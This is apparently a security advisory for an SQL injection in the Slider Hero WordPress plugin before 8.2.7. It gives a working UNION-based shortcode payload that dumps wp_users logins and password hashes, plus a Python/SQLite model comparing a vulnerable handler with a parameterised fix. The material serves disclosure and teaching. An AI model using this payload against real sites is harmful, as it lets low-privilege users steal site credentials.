WordPress Plugin Vulnerabilities

Slider Hero < 8.2.7 - Contributor+ SQL Injection

Description

The plugin does not sanitise or escape the id attribute of its hero-button shortcode before using it in a SQL statement. Since Contributors can place shortcodes in posts they author and preview them, any user with a role as low as Contributor can inject SQL through this attribute.

Proof of Concept

As a contributor, add the following shortcode to a post and preview it to execute the SQLi. The injected UNION row is shaped to match the column count of the plugin's own SELECT; its first FROM_BASE64() argument decodes to {"button_text":", so the concatenated user_login:user_pass pairs from wp_users are carried back inside the field the plugin renders as the button's text.

[hero-button id='1 UNION SELECT 2,"",2,1,NULL,"",NULL,0,NULL,"{}",999,NULL,CONCAT(CONCAT(CONCAT(CONCAT(FROM_BASE64("eyJidXR0b25fdGV4dCI6Ig=="),user_login),":"),user_pass),FROM_BASE64("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")),FROM_BASE64("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"),"",NULL,NULL,NULL,NULL,NULL FROM wp_users']
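The following is an added, self-contained model of the flaw and its fix; it is not the plugin's code. It stands in a toy hero-button table and a fake wp_users table (both constructed here) and uses SQLite, so the MySQL-only FROM_BASE64()/CONCAT() calls from the PoC above are replaced by SQLite's || operator. The vulnerable handler pastes the shortcode's id attribute into the query the way the advisory describes; the hardened handler coerces id to an integer and binds it as a parameter, which in WordPress is the absint() plus $wpdb->prepare() idiom.

```python
import sqlite3

# Constructed sample data, not the plugin's real schema: a toy hero-button table
# and a wp_users table holding fake password hashes.
BUTTONS = [
    (1, "Buy now", "https://example.test/buy"),
    (2, "Learn more", "https://example.test/about"),
]
WP_USERS = [
    (1, "admin", "$P$BfakeHashForDemoOnly0000000000"),
    (2, "editor", "$P$BanotherFakeHashForDemo000000"),
]


def _db():
    """Fresh in-memory database seeded with the constructed tables."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE hero_buttons (id INTEGER, label TEXT, url TEXT)")
    con.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    con.executemany("INSERT INTO hero_buttons VALUES (?, ?, ?)", BUTTONS)
    con.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", WP_USERS)
    return con


def render_button_vulnerable(attr_id):
    """Models the advisory's flaw: the shortcode id attribute goes straight into SQL."""
    con = _db()
    sql = f"SELECT id, label, url FROM hero_buttons WHERE id = {attr_id}"
    return con.execute(sql).fetchall()


def render_button_fixed(attr_id):
    """Hardened form: require a non-negative integer and bind it as a parameter.

    Unlike WordPress' absint(), which would silently truncate "1 UNION ..." to 1,
    this rejects anything that is not a whole non-negative integer.
    """
    try:
        button_id = int(str(attr_id).strip())
    except ValueError:
        return []
    if button_id < 0:
        return []
    con = _db()
    sql = "SELECT id, label, url FROM hero_buttons WHERE id = ?"
    return con.execute(sql, (button_id,)).fetchall()


# Constructed payload in the spirit of the PoC: the UNIONed SELECT must produce
# the same number of columns (three here) as the plugin's own query, and the
# login:hash pair is smuggled out through the column rendered as the label.
PAYLOAD = "1 UNION SELECT ID, user_login || ':' || user_pass, '' FROM wp_users"


def leaked_credentials(rows):
    """Return the login:hash strings that a UNION injection pulled into the label column."""
    return sorted(label for _, label, _ in rows if label.startswith(("admin:", "editor:")))


if __name__ == "__main__":
    print("vulnerable:", render_button_vulnerable(PAYLOAD))
    print("fixed:", render_button_fixed(PAYLOAD))
```

Running the block shows the vulnerable handler returning the two wp_users rows alongside button 1, while the fixed handler returns nothing for the payload and only the requested row for a plain numeric id.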

Affects Plugins

Fixed in 8.2.7

Classification

Type
SQLI

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes

Timeline

Publicly Published
2021-07-26
Added
2021-07-26
Last Updated
2022-02-24